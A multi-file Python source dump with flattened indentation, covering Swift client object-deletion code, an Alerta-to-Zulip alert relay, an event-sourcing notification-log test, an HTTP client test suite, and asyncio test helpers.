if container is not None:
if objects is not None:
if options['prefix']:
objects = [obj for obj in objects
if obj.startswith(options['prefix'])]
rq = Queue()
obj_dels = {}
if self._should_bulk_delete(objects):
for obj_slice in n_groups(
objects, self._options['object_dd_threads']):
self._bulk_delete(container, obj_slice, options,
obj_dels)
else:
self._per_item_delete(container, objects, options,
obj_dels, rq)
# Start a thread to watch for delete results
Thread(
target=self._watch_futures, args=(obj_dels, rq)
).start()
# yield results as they become available, raising the first
# encountered exception
res = get_from_queue(rq)
while res is not None:
yield res
# Cancel the remaining jobs if necessary
if options['fail_fast'] and not res['success']:
for d in obj_dels.keys():
d.cancel()
res = get_from_queue(rq)
else:
for res in self._delete_container(container, options):
yield res
else:
if objects:
raise SwiftError('Objects specified without container')
if options['prefix']:
raise SwiftError('Prefix specified without container')
if options['yes_all']:
cancelled = False
containers = []
for part in self.list():
if part["success"]:
containers.extend(c['name'] for c in part['listing'])
else:
raise part["error"]
for con in containers:
if cancelled:
break
else:
for res in self._delete_container(
con, options=options):
yield res
# Cancel the remaining container deletes, but yield
# any pending results
if (not cancelled and options['fail_fast']
and not res['success']):
cancelled = True
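# Hedged usage sketch (illustrative only): delete() yields one result dict per
# delete_container / delete_object / delete_segment / bulk_delete operation:
#
#     from swiftclient.service import SwiftService
#
#     with SwiftService() as swift:
#         for res in swift.delete(container='backups', objects=['old.bin']):
#             if not res['success']:
#                 print('delete failed:', res['error'])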
def _should_bulk_delete(self, objects):
if len(objects) < 2 * self._options['object_dd_threads']:
# Not many objects; may as well delete one-by-one
return False
try:
cap_result = self.capabilities()
if not cap_result['success']:
# This shouldn't actually happen, but just in case we start
# being more nuanced about our capabilities result...
return False
except ClientException:
# Old swift, presumably; assume no bulk middleware
return False
swift_info = cap_result['capabilities']
return 'bulk_delete' in swift_info
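# Decision sketch (thread count illustrative): with object_dd_threads == 10,
#
#     self._should_bulk_delete(['obj%d' % i for i in range(19)])  # False: < 2 * 10
#     self._should_bulk_delete(['obj%d' % i for i in range(20)])  # True, but only
#     # if the cluster's capabilities advertise 'bulk_delete'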
def _per_item_delete(self, container, objects, options, rdict, rq):
for obj in objects:
obj_del = self.thread_manager.object_dd_pool.submit(
self._delete_object, container, obj, options,
results_queue=rq
)
obj_details = {'container': container, 'object': obj}
rdict[obj_del] = obj_details
@staticmethod
def _delete_segment(conn, container, obj, results_queue=None):
results_dict = {}
try:
conn.delete_object(container, obj, response_dict=results_dict)
res = {'success': True}
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
}
res.update({
'action': 'delete_segment',
'container': container,
'object': obj,
'attempts': conn.attempts,
'response_dict': results_dict
})
if results_queue is not None:
results_queue.put(res)
return res
def _delete_object(self, conn, container, obj, options,
results_queue=None):
res = {
'action': 'delete_object',
'container': container,
'object': obj
}
try:
old_manifest = None
query_string = None
if not options['leave_segments']:
try:
headers = conn.head_object(container, obj)
old_manifest = headers.get('x-object-manifest')
if config_true_value(headers.get('x-static-large-object')):
query_string = 'multipart-manifest=delete'
except ClientException as err:
if err.http_status != 404:
raise
results_dict = {}
conn.delete_object(container, obj, query_string=query_string,
response_dict=results_dict)
if old_manifest:
dlo_segments_deleted = True
segment_pool = self.thread_manager.segment_pool
s_container, s_prefix = old_manifest.split('/', 1)
s_prefix = s_prefix.rstrip('/') + '/'
del_segs = []
for part in self.list(
container=s_container, options={'prefix': s_prefix}):
if part["success"]:
seg_list = [o["name"] for o in part["listing"]]
else:
raise part["error"]
for seg in seg_list:
del_seg = segment_pool.submit(
self._delete_segment, s_container,
seg, results_queue=results_queue
)
del_segs.append(del_seg)
for del_seg in interruptable_as_completed(del_segs):
del_res = del_seg.result()
if not del_res["success"]:
dlo_segments_deleted = False
res['dlo_segments_deleted'] = dlo_segments_deleted
res.update({
'success': True,
'response_dict': results_dict,
'attempts': conn.attempts,
})
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
return res
@staticmethod
def _delete_empty_container(conn, container):
results_dict = {}
try:
conn.delete_container(container, response_dict=results_dict)
res = {'success': True}
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
}
res.update({
'action': 'delete_container',
'container': container,
'object': None,
'attempts': conn.attempts,
'response_dict': results_dict
})
return res
def _delete_container(self, container, options):
try:
for part in self.list(container=container, options=options):
if not part["success"]:
raise part["error"]
for res in self.delete(
container=container,
objects=[o['name'] for o in part['listing']],
options=options):
yield res
if options['prefix']:
# We're only deleting a subset of objects within the container
return
con_del = self.thread_manager.container_pool.submit(
self._delete_empty_container, container
)
con_del_res = get_future_result(con_del)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
con_del_res = {
'action': 'delete_container',
'container': container,
'object': None,
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
}
yield con_del_res
# Bulk methods
#
def _bulk_delete(self, container, objects, options, rdict):
if objects:
bulk_del = self.thread_manager.object_dd_pool.submit(
self._bulkdelete, container, objects, options
)
bulk_details = {'container': container, 'objects': objects}
rdict[bulk_del] = bulk_details
@staticmethod
def _bulkdelete(conn, container, objects, options):
results_dict = {}
try:
headers = {
'Accept': 'application/json',
'Content-Type': 'text/plain',
}
res = {'container': container, 'objects': objects}
objects = [quote(('/%s/%s' % (container, obj)).encode('utf-8'))
for obj in objects]
headers, body = conn.post_account(
headers=headers,
query_string='bulk-delete',
data=b''.join(obj.encode('utf-8') + b'\n' for obj in objects),
response_dict=results_dict)
if body:
res.update({'success': True,
'result': parse_api_response(headers, body)})
else:
res.update({
'success': False,
'error': SwiftError(
'No content received on account POST. '
'Is the bulk operations middleware enabled?')})
except Exception as e:
res.update({'success': False, 'error': e})
res.update({
'action': 'bulk_delete',
'attempts': conn.attempts,
'response_dict': results_dict
})
return res
# Capabilities related methods
#
def capabilities(self, url=None, refresh_cache=False):
"""
List the cluster capabilities.
:param url: Proxy URL of the cluster to retrieve capabilities.
:param refresh_cache: If True, ignore any cached result for this URL and
query the cluster again.
:returns: A dictionary containing the capabilities of the cluster.
:raises: ClientException
"""
if not refresh_cache and url in self.capabilities_cache:
return self.capabilities_cache[url]
res = {
'action': 'capabilities',
'timestamp': time(),
}
cap = self.thread_manager.container_pool.submit(
self._get_capabilities, url
)
capabilities = get_future_result(cap)
res.update({
'success': True,
'capabilities': capabilities
})
if url is not None:
res.update({
'url': url
})
self.capabilities_cache[url] = res
return res
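# Hedged usage sketch (illustrative only): results are cached per URL, so a
# repeated call is cheap unless refresh_cache=True is passed:
#
#     with SwiftService() as swift:
#         cap = swift.capabilities()
#         if 'slo' in cap['capabilities']:
#             print('cluster supports static large objects')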
@staticmethod
def _get_capabilities(conn, url):
return conn.get_capabilities(url)
# Helper methods
#
@staticmethod
def _watch_futures(futures, result_queue):
"""
Watches a dict of futures and pushes their results onto the given
queue. We use this to wait for a set of futures which may create
futures of their own to wait for, whilst also allowing us to
immediately return the results of those sub-jobs.
When all futures have completed, None is pushed to the queue.
If a future is cancelled, we use the dict to return details about
the cancellation.
"""
futures_only = list(futures.keys())
for f in interruptable_as_completed(futures_only):
try:
r = f.result()
if r is not None:
result_queue.put(r)
except CancelledError:
details = futures[f]
res = details
res['status'] = 'cancelled'
result_queue.put(res)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
details = futures[f]
res = details
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
result_queue.put(res)
result_queue.put(None)
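# Usage sketch (mirrors the upload() and delete() call sites above): build a
# dict mapping futures to descriptive details, hand it to a watcher thread,
# then drain the queue until the terminating None appears:
#
#     jobs = {pool.submit(job_fn, obj): {'container': cont, 'object': obj}
#             for obj in objects}
#     rq = Queue()
#     Thread(target=self._watch_futures, args=(jobs, rq)).start()
#     res = get_from_queue(rq)
#     while res is not None:
#         yield res
#         res = get_from_queue(rq)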
|
alerta_client.py
|
import logging
import os
import threading
import time
from datetime import datetime, timedelta
from alertaclient.api import Client
from alertanio.config.static_config import AlertaConfiguration, topic_map
from alertanio.database import DBHelper
from alertanio.zulip_client import ZulipClient
LOGGER = logging.getLogger(__name__)
LOGGER.setLevel(logging.DEBUG)
ALERTA_API_KEY = os.environ.get('ALERTA_API_KEY')
TIME_FILE = '/tmp/alertanio.time'
class AlertaClient:
"""Alerta client wrapper"""
_alerta: Client = None
_alerta_thread: threading.Thread
def __init__(self, db_host, db_port, db_user, db_password, environment='prod'):
self.alerta_api_key = ALERTA_API_KEY
self.db_host = db_host
self.db_port = db_port
self.db_user = db_user
self.db_password = db_password
self.environment = environment
self.load_configuration()
@property
def alerta(self):
"""Return alerta instance, create new if missing"""
if self._alerta is None:
LOGGER.warning('No Alerta client exists; creating one.')
self._alerta = Client(
endpoint=self.alerta_config.alerta_endpoint,
debug=self.alerta_config.alerta_debug,
timeout=self.alerta_config.alerta_timeout,
key=self.alerta_api_key
)
return self._alerta
def load_configuration(self):
"""Load/Re-Load Alerta configuration and Topics templates"""
self.db = DBHelper(
host=self.db_host,
port=self.db_port,
user=self.db_user,
password=self.db_password
)
self.db.__connect__()
self.alerta_config = AlertaConfiguration(
*self.db.get(
columns='*',
table='configuration',
condition=f"config_name='{self.environment}'")[0])
self.templates = dict(self.db.get(
columns='topic_name, template_data',
table='templates',
custom_clause='INNER JOIN topics ON templates.template_id=topics.templ_id'))
self.topics = topic_map(self.db.get(table='topics', columns='topic_name, zulip_to, zulip_subject'))
self.db.__disconnect__()
self.zulip = ZulipClient(self.templates, self.topics)
def write_last_run_time(self, timestamp):
with open(TIME_FILE, 'w') as file:
file.write(timestamp)
def read_last_run_time(self):
try:
with open(TIME_FILE, 'r') as file:
return file.read()
except FileNotFoundError:
return None
def start_fetching(self, auto_refresh=True, interval=5):
"""Start fetching updates from Alerta
Date format for query: 2020-05-20T11:00:00.000Z
"""
last_run = self.read_last_run_time()
while auto_refresh:
if last_run is not None:
current_time = last_run
last_run = None
else:
current_time = (datetime.utcnow() - timedelta(seconds=interval)).isoformat().split('.')[0] + '.000Z'
alerts = self.alerta.get_alerts(query=[('from-date', current_time)])
for alert in alerts:
if not alert.repeat and alert.status not in ['ack', 'blackout', 'closed']:
self.zulip.post_receive(alert)
self.write_last_run_time(current_time)
time.sleep(interval)
def start(self):
"""Start alerta"""
self._alerta_thread = threading.Thread(
target=self.start_fetching,
name="Alerta-Thread")
self._alerta_thread.start()
self._alerta_thread.join()
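# Hedged usage sketch (values illustrative; assumes ALERTA_API_KEY is set in
# the environment and the configuration database is reachable):
#
#     client = AlertaClient(db_host='localhost', db_port=5432,
#                           db_user='alerta', db_password='secret')
#     client.start()  # blocks: polls Alerta every 5 seconds and relays to Zulip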
|
test_remotenotificationlog.py
|
import json
import threading
from abc import abstractmethod
from http.client import HTTPConnection
from http.server import BaseHTTPRequestHandler, HTTPServer
from threading import Event, Thread
from typing import Callable, List, Sequence
from unittest.case import TestCase
from uuid import UUID
from eventsourcing.interface import (
NotificationLogInterface,
NotificationLogJSONClient,
NotificationLogJSONService,
)
from eventsourcing.tests.application import BankAccounts
class TestRemoteNotificationLog(TestCase):
def test_directly(self):
client = BankAccountsJSONClient(BankAccountsJSONService(BankAccounts()))
account_id1 = client.open_account("Alice", "alice@example.com")
account_id2 = client.open_account("Bob", "bob@example.com")
# Get the "first" section of log.
section = client.log["1,10"]
self.assertEqual(len(section.items), 2)
self.assertEqual(section.items[0].originator_id, account_id1)
self.assertEqual(section.items[1].originator_id, account_id2)
# Get notifications start 1, limit 10.
notifications = client.log.select(start=1, limit=10)
self.assertEqual(len(notifications), 2)
self.assertEqual(notifications[0].originator_id, account_id1)
self.assertEqual(notifications[1].originator_id, account_id2)
def test_with_http(self):
server_address = ("127.0.0.1", 8080)
server = HTTPApplicationServer(
address=server_address,
handler=BankAccountsHTTPHandler,
)
server.start()
if not server.is_running.wait(timeout=5):
server.stop()
self.fail("Unable to start HTTPApplicationServer")
try:
client = BankAccountsJSONClient(
BankAccountsHTTPClient(server_address=server_address)
)
account_id1 = client.open_account("Alice", "alice@example.com")
account_id2 = client.open_account("Bob", "bob@example.com")
# Get the "first" section of log.
section = client.log["1,10"]
self.assertEqual(len(section.items), 2)
self.assertEqual(section.items[0].originator_id, account_id1)
self.assertEqual(section.items[1].originator_id, account_id2)
# Get notifications start 1, limit 10.
notifications = client.log.select(1, 10)
self.assertEqual(len(notifications), 2)
self.assertEqual(notifications[0].originator_id, account_id1)
self.assertEqual(notifications[1].originator_id, account_id2)
finally:
server.stop()
def test_with_http_and_threads(self):
server_address = ("127.0.0.1", 8081)
server = HTTPApplicationServer(
address=server_address,
handler=BankAccountsHTTPHandler,
)
server.start()
if not server.is_running.wait(timeout=5):
server.stop()
self.fail("Unable to start HTTPApplicationServer")
try:
self.has_errors = False
def open_account():
client = BankAccountsJSONClient(
BankAccountsHTTPClient(server_address=server_address)
)
for _ in range(30):
try:
client.open_account("Alice", "alice@example.com")
# print(threading.get_ident(), account_id1)
except Exception as e:
print(threading.get_ident(), "error:", e)
self.has_errors = True
raise
thread1 = Thread(target=open_account)
thread1.start()
thread2 = Thread(target=open_account)
thread2.start()
thread1.join()
thread2.join()
self.assertFalse(self.has_errors)
# Check the notification log.
client = BankAccountsJSONClient(
BankAccountsHTTPClient(server_address=server_address)
)
self.assertEqual(len(client.log["1,10"].items), 10)
self.assertEqual(len(client.log["11,20"].items), 10)
self.assertEqual(len(client.log["21,30"].items), 10)
self.assertEqual(len(client.log["31,40"].items), 10)
self.assertEqual(len(client.log["41,50"].items), 10)
self.assertEqual(len(client.log["51,60"].items), 10)
self.assertEqual(len(client.log["61,70"].items), 0)
self.assertEqual(len(client.log.select(start=1, limit=10)), 10)
self.assertEqual(len(client.log.select(start=11, limit=10)), 10)
self.assertEqual(len(client.log.select(start=21, limit=10)), 10)
self.assertEqual(len(client.log.select(start=31, limit=10)), 10)
self.assertEqual(len(client.log.select(start=41, limit=10)), 10)
self.assertEqual(len(client.log.select(start=51, limit=10)), 10)
self.assertEqual(len(client.log.select(start=61, limit=10)), 0)
finally:
server.stop()
class BankAccountsInterface(NotificationLogInterface):
@abstractmethod
def open_account(self, body: str) -> str:
pass
class BankAccountsJSONService(
BankAccountsInterface,
NotificationLogJSONService[BankAccounts],
):
def open_account(self, request: str) -> str:
kwargs = json.loads(request)
account_id = self.app.open_account(**kwargs)
return json.dumps({"account_id": account_id.hex})
class BankAccountsJSONClient:
def __init__(self, interface: BankAccountsInterface):
self.interface = interface
self.log = NotificationLogJSONClient(interface)
def open_account(self, full_name, email_address) -> UUID:
body = json.dumps(
{
"full_name": full_name,
"email_address": email_address,
}
)
body = self.interface.open_account(body)
return UUID(json.loads(body)["account_id"])
class HTTPApplicationServer(Thread):
prepare: List[Callable] = []
def __init__(self, address, handler):
super(HTTPApplicationServer, self).__init__(daemon=True)
self.server = HTTPServer(
server_address=address,
RequestHandlerClass=handler,
)
self.is_running = Event()
def run(self):
for f in self.prepare:
f()
self.is_running.set()
self.server.serve_forever()
def stop(self):
self.server.shutdown()
self.join()
@classmethod
def before_first_request(cls, f):
HTTPApplicationServer.prepare.append(f)
return f
class BankAccountsHTTPHandler(BaseHTTPRequestHandler):
def do_PUT(self):
if self.path.startswith("/accounts/"):
length = int(self.headers["Content-Length"])
request_msg = self.rfile.read(length).decode("utf8")
body = bank_accounts_service.open_account(request_msg)
status = 201
else:
body = "Not found: " + self.path
status = 404
self.send(body, status)
def do_GET(self):
if self.path.startswith("/notifications/"):
section_id = self.path.split("/")[-1]
body = bank_accounts_service.get_log_section(section_id)
status = 200
elif self.path.startswith("/notifications"):
args = self.path.split("?")[-1].split("&")
args = [p.split("=") for p in args]
args = {p[0]: p[1] for p in args}
start = int(args["start"])
limit = int(args["limit"])
body = bank_accounts_service.get_notifications(start=start, limit=limit)
status = 200
else:
body = "Not found: " + self.path
status = 404
self.send(body, status)
def send(self, body: str, status: int):
self.send_response(status)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(body.encode("utf8"))
class BankAccountsHTTPClient(BankAccountsInterface):
def __init__(self, server_address):
self.connection = HTTPConnection(*server_address)
def get_log_section(self, section_id: str) -> str:
return self._request("GET", "/notifications/{}".format(section_id))
def get_notifications(
self, start: int, limit: int, topics: Sequence[str] = ()
) -> str:
return self._request("GET", f"/notifications?start={start}&limit={limit}")
def open_account(self, body: str) -> str:
return self._request("PUT", "/accounts/", body.encode("utf8"))
def _request(self, method, url, body=None):
self.connection.request(method, url, body)
response = self.connection.getresponse()
return response.read().decode()
bank_accounts_service: BankAccountsInterface
@HTTPApplicationServer.before_first_request
def init_bank_accounts() -> None:
global bank_accounts_service
bank_accounts_service = BankAccountsJSONService(BankAccounts())
|
freetests.py
|
#!/usr/bin/env python3
# coding: utf-8
# Copyright 2013 Abram Hindle
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# run python freetests.py
import unittest
import httpclient
import http.server
import threading
import socketserver
import random
import time
import urllib.parse
import json
BASEHOST = "127.0.0.1"
BASEPORT = 27600 + random.randint(1, 100)
httpclass = httpclient
# import mysolution
# httpclass = mysolution
# Sorry but in Python this comes out of the box!
class MyHTTPHandler(http.server.BaseHTTPRequestHandler):
post = None
get = None
def do_POST(self):
try:
if self.post == None:
return None
else:
return self.post()
except Exception as e:
print("Exception %s\n" % e)
raise e
def do_GET(self):
try:
print("GET %s\n" % self.path)
if self.get == None:
return None
else:
return self.get()
except Exception as e:
print("Exception %s\n" % e)
raise e
def make_http_server(host=BASEHOST, port=BASEPORT):
return http.server.HTTPServer((host, port), MyHTTPHandler)
# always returns 404
def nothing_available(self):
self.send_error(404, "File not found")
self.end_headers()
self.wfile.write(bytes("", "utf-8"))
# repeats your path back
def echo_path_get(self):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes("%s\n" % self.path, "utf-8"))
# repeats your post back as json
def echo_post(self):
length = int(self.headers["Content-Length"])
post_data = urllib.parse.parse_qs(self.rfile.read(length).decode("utf-8"))
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(post_data), "utf-8"))
def header_check(self):
response = 200
errors = []
if "Host" not in self.headers:
response = 400
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors), "utf-8"))
def die_on_method(self):
response = 405
errors = []
errors.append("Method Not Allowed")
if "Host" not in self.headers:
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors), "utf-8"))
def post_header_check(self):
response = 200
errors = []
if "Host" not in self.headers:
response = 400
errors.append("No Host header found")
if "Content-length" not in self.headers:
response = 400
errors.append("No Content-Length header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors), "utf-8"))
class TestHTTPClient(unittest.TestCase):
httpd = None
running = False
@classmethod
def setUpClass(self):
"""Cache the httpd server and run it as a thread"""
if TestHTTPClient.httpd == None:
try:
self.thread = threading.Thread(target=self.run_server)
self.thread.start()
time.sleep(1)
except Exception as e:
print(e)
print("setUpClass: Thread died")
raise e
@classmethod
def run_server(self):
"""run the httpd server in a thread"""
try:
socketserver.TCPServer.allow_reuse_address = True
http.server.HTTPServer.allow_reuse_address = True
TestHTTPClient.httpd = make_http_server()
print("HTTP UP!\n")
TestHTTPClient.httpd.serve_forever()
print("HTTP has been shutdown!\n")
except Exception as e:
print(e)
print("run_server: Thread died")
def test404GET(self):
"""Test against 404 errors"""
MyHTTPHandler.get = nothing_available
http = httpclass.HTTPClient()
req = http.GET("http://%s:%d/49872398432" % (BASEHOST, BASEPORT))
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def test404POST(self):
"""Test against 404 errors"""
MyHTTPHandler.post = nothing_available
http = httpclass.HTTPClient()
req = http.POST("http://%s:%d/49872398432" % (BASEHOST, BASEPORT))
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def testGET(self):
"""Test HTTP GET"""
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST, BASEPORT, path)
req = http.GET(url)
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
self.assertTrue(req.body.find(path) >= 0, "Data: [%s] " % req.body)
def testGETHeaders(self):
"""Test HTTP GET Headers"""
MyHTTPHandler.get = header_check
MyHTTPHandler.post = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST, BASEPORT, path)
req = http.GET(url)
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
def testPOSTHeaders(self):
"""Test HTTP POST Headers"""
MyHTTPHandler.post = post_header_check
MyHTTPHandler.get = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST, BASEPORT, path)
req = http.POST(url)
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200, "Code is %s but I wanted a 200 OK" % req.code)
# consider disabling this test until everything else works
def testInternetGets(self):
"""Test HTTP Get in the wild, these webservers are far less
forgiving"""
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
urls = [
"http://www.cs.ualberta.ca/",
"http://softwareprocess.es/static/SoftwareProcess.es.html",
"http://c2.com/cgi/wiki?CommonLispHyperSpec",
"http://slashdot.org",
]
for url in urls:
try:
req = http.GET(url)
except Exception as e:
print("An Exception was thrown for %s" % url)
self.assertTrue(False, "An Exception was thrown for %s %s" % (url, e))
self.assertTrue(req != None, "None Returned! %s" % url)
self.assertTrue(
req.code == 200 or req.code == 301 or req.code == 302,
"Code: %s for %s" % (req.code, url),
)
if req.code == 200:
self.assertTrue(
req.body.find("DOCTYPE") >= 0 or req.body.find("<body") >= 0,
"%s Data: [%s] " % (url, req.body),
)
def testPOST(self):
"""Test HTTP POST with an echo server"""
MyHTTPHandler.post = echo_post
http = httpclass.HTTPClient()
path = "post_echoer"
url = "http://%s:%d/%s" % (BASEHOST, BASEPORT, path)
args = {
"a": "aaaaaaaaaaaaa",
"b": "bbbbbbbbbbbbbbbbbbbbbb",
"c": "c",
"d": "012345\r67890\n2321321\n\r",
}
print("Sending POST!")
req = http.POST(url, args=args)
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
print("Test Post Body: [%s]" % req.body)
outargs = json.loads(req.body)
print(outargs.__class__)
for key in args:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
for key in outargs:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
@classmethod
def tearDownClass(self):
if TestHTTPClient.httpd != None:
print("HTTP Shutdown in tearDown\n")
TestHTTPClient.httpd.shutdown()
TestHTTPClient.httpd.server_close()
time.sleep(1)
def test_test_webserver():
print("http://%s:%d/dsadsadsadsa\n" % (BASEHOST, BASEPORT))
MyHTTPHandler.get = echo_path_get
MyHTTPHandler.post = echo_post
httpd = make_http_server()
try:
httpd.serve_forever()
finally:
httpd.shutdown()
if __name__ == "__main__":
unittest.main()
|
test_utils.py
|
"""Utilities shared by tests."""
import collections
import contextlib
import io
import logging
import os
import re
import socket
import socketserver
import sys
import tempfile
import threading
import time
import unittest
import weakref
from unittest import mock
from http.server import HTTPServer
from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
from . import base_events
from . import events
from . import futures
from . import selectors
from . import tasks
from .coroutines import coroutine
from .log import logger
from test import support
if sys.platform == 'win32': # pragma: no cover
from .windows_utils import socketpair
else:
from socket import socketpair # pragma: no cover
def dummy_ssl_context():
if ssl is None:
return None
else:
return ssl.SSLContext(ssl.PROTOCOL_TLS)
def run_briefly(loop):
@coroutine
def once():
pass
gen = once()
t = loop.create_task(gen)
# Don't log a warning if the task is not done after run_until_complete().
# It occurs if the loop is stopped or if a task raises a BaseException.
t._log_destroy_pending = False
try:
loop.run_until_complete(t)
finally:
gen.close()
def run_until(loop, pred, timeout=30):
deadline = time.time() + timeout
while not pred():
if timeout is not None:
timeout = deadline - time.time()
if timeout <= 0:
raise futures.TimeoutError()
loop.run_until_complete(tasks.sleep(0.001, loop=loop))
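def _example_run_until(loop):
    # Hedged usage sketch (not part of the original helpers): run_until()
    # above spins the loop in 1 ms sleeps until the predicate holds or the
    # deadline passes. The callback and flag here are illustrative only.
    fired = []
    loop.call_later(0.01, fired.append, True)
    run_until(loop, lambda: bool(fired), timeout=5)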
def run_once(loop):
"""Legacy API to run once through the event loop.
This is the recommended pattern for test code. It will poll the
selector once and run all callbacks scheduled in response to I/O
events.
"""
loop.call_soon(loop.stop)
loop.run_forever()
class SilentWSGIRequestHandler(WSGIRequestHandler):
def get_stderr(self):
return io.StringIO()
def log_message(self, format, *args):
pass
class SilentWSGIServer(WSGIServer):
request_timeout = 2
def get_request(self):
request, client_addr = super().get_request()
request.settimeout(self.request_timeout)
return request, client_addr
def handle_error(self, request, client_address):
pass
class SSLWSGIServerMixin:
def finish_request(self, request, client_address):
# The relative location of our test directory (which
# contains the ssl key and certificate files) differs
# between the stdlib and stand-alone asyncio.
# Prefer our own if we can find it.
here = os.path.join(os.path.dirname(__file__), '..', 'tests')
if not os.path.isdir(here):
here = os.path.join(os.path.dirname(os.__file__),
'test', 'test_asyncio')
keyfile = os.path.join(here, 'ssl_key.pem')
certfile = os.path.join(here, 'ssl_cert.pem')
context = ssl.SSLContext()
context.load_cert_chain(certfile, keyfile)
ssock = context.wrap_socket(request, server_side=True)
try:
self.RequestHandlerClass(ssock, client_address, self)
ssock.close()
except OSError:
# maybe socket has been closed by peer
pass
class SSLWSGIServer(SSLWSGIServerMixin, SilentWSGIServer):
pass
def _run_test_server(*, address, use_ssl=False, server_cls, server_ssl_cls):
def app(environ, start_response):
status = '200 OK'
headers = [('Content-type', 'text/plain')]
start_response(status, headers)
return [b'Test message']
# Run the test WSGI server in a separate thread in order not to
# interfere with event handling in the main thread
server_class = server_ssl_cls if use_ssl else server_cls
httpd = server_class(address, SilentWSGIRequestHandler)
httpd.set_app(app)
httpd.address = httpd.server_address
server_thread = threading.Thread(
target=lambda: httpd.serve_forever(poll_interval=0.05))
server_thread.start()
try:
yield httpd
finally:
httpd.shutdown()
httpd.server_close()
server_thread.join()
if hasattr(socket, 'AF_UNIX'):
class UnixHTTPServer(socketserver.UnixStreamServer, HTTPServer):
def server_bind(self):
socketserver.UnixStreamServer.server_bind(self)
self.server_name = '127.0.0.1'
self.server_port = 80
class UnixWSGIServer(UnixHTTPServer, WSGIServer):
request_timeout = 2
def server_bind(self):
UnixHTTPServer.server_bind(self)
self.setup_environ()
def get_request(self):
request, client_addr = super().get_request()
request.settimeout(self.request_timeout)
# Code in the stdlib expects that get_request
# will return a socket and a tuple (host, port).
# However, this isn't true for UNIX sockets,
# as the second return value will be a path;
# hence we return some fake data sufficient
# to get the tests going
return request, ('127.0.0.1', '')
class SilentUnixWSGIServer(UnixWSGIServer):
def handle_error(self, request, client_address):
pass
class UnixSSLWSGIServer(SSLWSGIServerMixin, SilentUnixWSGIServer):
pass
def gen_unix_socket_path():
with tempfile.NamedTemporaryFile() as file:
return file.name
@contextlib.contextmanager
def unix_socket_path():
path = gen_unix_socket_path()
try:
yield path
finally:
try:
os.unlink(path)
except OSError:
pass
@contextlib.contextmanager
def run_test_unix_server(*, use_ssl=False):
with unix_socket_path() as path:
yield from _run_test_server(address=path, use_ssl=use_ssl,
server_cls=SilentUnixWSGIServer,
server_ssl_cls=UnixSSLWSGIServer)
@contextlib.contextmanager
def run_test_server(*, host='127.0.0.1', port=0, use_ssl=False):
yield from _run_test_server(address=(host, port), use_ssl=use_ssl,
server_cls=SilentWSGIServer,
server_ssl_cls=SSLWSGIServer)
def make_test_protocol(base):
dct = {}
for name in dir(base):
if name.startswith('__') and name.endswith('__'):
# skip magic names
continue
dct[name] = MockCallback(return_value=None)
return type('TestProtocol', (base,) + base.__bases__, dct)()
class TestSelector(selectors.BaseSelector):
def __init__(self):
self.keys = {}
def register(self, fileobj, events, data=None):
key = selectors.SelectorKey(fileobj, 0, events, data)
self.keys[fileobj] = key
return key
def unregister(self, fileobj):
return self.keys.pop(fileobj)
def select(self, timeout):
return []
def get_map(self):
return self.keys
class TestLoop(base_events.BaseEventLoop):
"""Loop for unittests.
It manages self time directly.
If something scheduled to be executed later then
on next loop iteration after all ready handlers done
generator passed to __init__ is calling.
Generator should be like this:
def gen():
...
when = yield ...
... = yield time_advance
Value returned by yield is absolute time of next scheduled handler.
Value passed to yield is time advance to move loop's time forward.
"""
def __init__(self, gen=None):
super().__init__()
if gen is None:
def gen():
yield
self._check_on_close = False
else:
self._check_on_close = True
self._gen = gen()
next(self._gen)
self._time = 0
self._clock_resolution = 1e-9
self._timers = []
self._selector = TestSelector()
self.readers = {}
self.writers = {}
self.reset_counters()
self._transports = weakref.WeakValueDictionary()
def time(self):
return self._time
def advance_time(self, advance):
"""Move test time forward."""
if advance:
self._time += advance
def close(self):
super().close()
if self._check_on_close:
try:
self._gen.send(0)
except StopIteration:
pass
else: # pragma: no cover
raise AssertionError("Time generator is not finished")
